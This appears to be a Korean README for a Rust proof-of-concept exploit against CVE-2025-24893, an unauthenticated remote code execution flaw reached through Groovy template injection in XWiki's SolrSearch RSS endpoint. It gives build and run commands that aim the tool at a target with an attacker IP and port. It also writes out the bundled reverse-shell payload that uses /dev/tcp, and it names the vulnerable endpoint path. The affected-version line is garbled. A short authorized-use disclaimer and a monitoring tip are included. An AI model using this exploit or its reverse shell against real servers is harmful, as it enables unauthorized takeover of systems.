
CVE-2025-24893에 대한 개념 증명(PoC) 익스플로잇으로, XWiki에서 인증 없이 원격 코드 실행(RCE)이 가능한 취약점입니다. Groovy 스크립트 실행을 통해 SolrSearch 엔드포인트의 템플릿 주입 결함을 악용합니다.
CVE-2025-24893에 대한 개념 증명(PoC) 익스플로잇, XWiki의 중요한 비인증 원격 코드 실행(RCE) 취약점.
이 익스플로잇은 SolrSearch 엔드포인트의 Groovy 템플릿 주입을 악용하여 인증 없이 임의 명령(리버스 셸 포함)을 실행합니다.
XWiki가 SolrSearch RSS 엔드포인트에 대한 조작된 입력을 처리하는 방식의 결함으로 인해 공격자가 렌더링 파이프라인에 Groovy 코드를 주입할 수 있습니다.
이로 인해 {{groovy}} 스크립트 블록을 통한 비인증 RCE가 가능합니다.
< 15.10.11>= 16.0.0 및 < 16.4.115.10.1116.4.1릴리스를 다운로드하세요:
또는 소스에서 빌드하세요:
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
다음과 같은 형태의 사전 빌드된 리버스 셸 페이로드가 있습니다:
bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1
이 코드는 교육 및 승인된 보안 연구 목적으로만 사용하세요. 소유하지 않거나 명시적 테스트 권한이 없는 시스템에 이 익스플로잇을 사용하지 마세요.
/bin/get/Main/SolrSearch?media=rss의 의심스러운 사용 모니터링